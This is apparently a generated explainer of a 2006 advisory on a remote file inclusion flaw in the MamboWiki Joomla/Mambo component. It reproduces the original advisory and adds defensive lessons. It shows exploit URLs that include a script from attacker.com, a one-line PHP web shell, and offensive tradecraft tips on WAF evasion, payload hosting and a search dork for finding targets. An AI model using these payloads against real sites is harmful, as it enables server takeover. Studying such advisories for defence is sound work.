Understanding MamboWiki Remote File Inclusion: A Historical Exploit Deep Dive

What this paper is

This paper is a security advisory published in 2006 by "camino" from the "Insecurity Research Team." It details a Remote File Inclusion (RFI) vulnerability found in MamboWiki, a component for the Mambo/Joomla Content Management System (CMS), specifically affecting versions up to and including 0.9.6. The advisory explains how an attacker can exploit this vulnerability to include and execute arbitrary files from a remote server, leading to potential code execution on the target web server.

Simple technical breakdown

The vulnerability lies in how the MamboLogin.php file handles user input. Specifically, it appears to use a parameter (identified as IP in the exploit example) to specify a file to include. If this parameter is not properly validated, an attacker can provide a URL pointing to a malicious PHP script hosted on their own server. When the vulnerable MamboLogin.php script processes this URL, it fetches the remote script and executes it as if it were a local file, effectively allowing remote code execution.

Complete code and payload walkthrough

The provided paper does not contain any executable code or shellcode. It describes the vulnerability and provides a URL pattern for exploitation.

• Vulnerable File: MamboLogin.php (within the com_mambowiki component).
• Vulnerable Parameter: The paper implies the IP parameter is used for file inclusion.
• Exploit URL Pattern: http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php?IP=http://huh?

Explanation of the Exploit URL Pattern:

• http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php: This is the base URL pointing to the vulnerable script on the target Mambo/Joomla installation.
  • [sitepath]: The domain or IP address of the target website.
  • [joomlapath]: The directory path where Joomla or Mambo is installed.
  • components/com_mambowiki/MamboLogin.php: The specific path to the vulnerable component file.
• ?IP=: This indicates the start of query parameters, with IP being the parameter name.
• http://huh?: This is a placeholder for the attacker-controlled remote file. The http:// signifies that a remote URL is being provided. The huh? is likely a simple, non-existent domain or path, but the crucial part is that it's a URL. An attacker would replace this with a URL pointing to their malicious script, e.g., http://attacker.com/malicious.txt.

How it works (conceptual):

1. The attacker crafts a URL like: http://target.com/mambo/components/com_mambowiki/MamboLogin.php?IP=http://attacker.com/shell.txt
2. The target web server receives this request.
3. The MamboLogin.php script, if vulnerable, takes the value of the IP parameter (http://attacker.com/shell.txt).
4. It then attempts to include this file using a PHP function like include() or require().
5. PHP's include() or require() functions, when given a URL, will fetch the content from the remote URL.
6. If the fetched content is valid PHP code (e.g., shell.txt contains <?php system($_GET['cmd']); ?>), it will be executed on the target server.

Mapping:

• MamboLogin.php?IP=http://attacker.com/malicious.php -> Remote File Inclusion leading to potential Remote Code Execution.

No code or shellcode is provided in the original paper to analyze directly. The exploit is described as a URL manipulation.

Practical details for offensive operations teams

• Required Access Level: Unauthenticated (remote). This is a classic web application vulnerability that can be triggered by any user who can send HTTP requests to the target.
• Lab Preconditions:
  • A vulnerable Mambo/Joomla installation with the com_mambowiki component version <= 0.9.6. This is the most critical prerequisite. Setting up such an old environment might require specific OS versions, PHP versions, and web server configurations.
  • A separate server controlled by the operator to host the malicious payload (e.g., a PHP web shell).
  • Network connectivity between the target and the attacker's payload server.
• Tooling Assumptions:
  • Web browser for manual testing or reconnaissance.
  • HTTP request manipulation tools (e.g., Burp Suite, OWASP ZAP) to craft and send requests.
  • A simple web server (e.g., Python's http.server, Apache, Nginx) on the attacker's machine to serve the payload.
  • A payload file (e.g., a PHP web shell like shell.php containing <?php system($_GET['cmd']); ?>).
• Execution Pitfalls:
  • WAF/IPS Evasion: Modern Web Application Firewalls (WAFs) and Intrusion Prevention Systems (IPS) are highly likely to detect and block requests containing suspicious URLs or attempts to include remote files. The IP parameter name itself might be flagged.
  • Server Configuration: Some server configurations might disable allow_url_fopen or allow_url_include in php.ini, which are necessary for PHP to fetch remote files via URLs. This is a common defense.
  • Component Not Installed: The com_mambowiki component might not be installed on the target Mambo/Joomla site.
  • Incorrect Path: The [sitepath] or [joomlapath] might be incorrect, leading to a 404 error.
  • Payload Detection: The content of the remote file might be detected by security software on the target server if it's too obviously malicious.
  • Obfuscation: Simple payloads might be detected. More sophisticated payloads might be needed, but the RFI itself is the primary hurdle.
• Tradecraft Considerations:
  • Reconnaissance: Identifying the Mambo/Joomla version and installed components is crucial. Dorks like inurl:"com_mambowiki" (as suggested in the paper) are valuable for this.
  • Payload Hosting: Ensure the payload server is stable and accessible from the target. Consider using a domain that doesn't immediately scream "malicious."
  • Post-Exploitation: Once a web shell is achieved, the attacker can then explore further actions, but the initial RFI is the entry point.

Where this was used and when

• Context: This vulnerability was relevant for attackers targeting websites running Mambo or Joomla CMS platforms that had the com_mambowiki component installed and vulnerable.
• Approximate Year/Date: Published on August 18, 2006. Exploitation would have occurred around this time and potentially for a period afterward until patches were applied or the vulnerable software was upgraded.

Defensive lessons for modern teams

• Input Validation is Paramount: Always validate and sanitize all user-supplied input, especially when it's used in file inclusion, database queries, or system commands. The IP parameter in this case was treated as a trusted file path.
• Secure Configuration: Ensure allow_url_fopen and allow_url_include are disabled in php.ini unless absolutely necessary for legitimate functionality. Disabling these is a strong defense against RFI.
• Patch Management: Keep all CMS platforms, components, and plugins updated to the latest stable versions. This vulnerability was patched by adding a simple check.
• Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common web attack patterns, including RFI attempts.
• Least Privilege: Ensure web server processes run with the minimum necessary privileges to limit the impact of a successful compromise.
• Code Review: Regularly review custom or third-party code for common vulnerabilities like RFI, LFI, SQLi, etc.

ASCII visual (if applicable)

This vulnerability is a direct interaction between a web client and a web server script. An ASCII visual can illustrate the flow of the request and the inclusion process.

+-----------------+      HTTP Request      +-----------------+      File Inclusion      +-----------------+
| Attacker's      | ---------------------> | Target Web      | ---------------------> | Attacker's      |
| Machine         | (e.g., Malicious URL)  | Server          | (e.g., PHP include())  | Payload Server  |
| (e.g., Kali)    |                        | (Vulnerable     |                        | (e.g., Apache)  |
|                 |                        | MamboLogin.php) |                        |                 |
+-----------------+                        +-----------------+                        +-----------------+
        ^                                          |
        |                                          | HTTP Response (e.g., executed code)
        |------------------------------------------|

Explanation:

1. The attacker crafts a malicious URL pointing to the vulnerable script on the target server, but with a parameter that includes a URL to their own payload.
2. The target web server receives this request and passes it to MamboLogin.php.
3. MamboLogin.php, due to the vulnerability, interprets the parameter as a file to include and makes an HTTP request to the attacker's payload server.
4. The attacker's server responds with the malicious payload (e.g., a PHP web shell).
5. The target web server's PHP interpreter executes the received payload.
6. The result of the execution is sent back to the attacker as part of the HTTP response.

Source references

• Paper URL: https://www.exploit-db.com/papers/2213
• Exploit-DB Raw URL: https://www.exploit-db.com/raw/2213
• Affected Application: MamboWiki <= v0.9.6
• Author: camino (Insecurity Research Team)
• Published: 2006-08-18

Original Exploit-DB Content (Verbatim)

.:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: 18.o8.2oo6 ..
 
 
  Affected Application: MamboWiki <= v0.9.6

          (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino[at]sexmagnet[dot]com
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [ ]  High [x]
 
  Application: MamboWiki
 
  Version: <= 0.9.6
 
  Vulnerable File: MamboLogin.php
 
  URL: http://www.lyquidity.com
 
  Description: A component like Wikipedia for Jooma/Mambo.
 
  Dork: inurl:"com_mambowiki"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


  http://[sitepath]/[joomlapath]/components/com_mambowiki/ MamboLogin.php?IP=http://huh?
 
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open MamboLogin.php
 
  o2.) add this in line 8:

         defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );

  o3.) done!



 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)

# milw0rm.com [2006-08-18]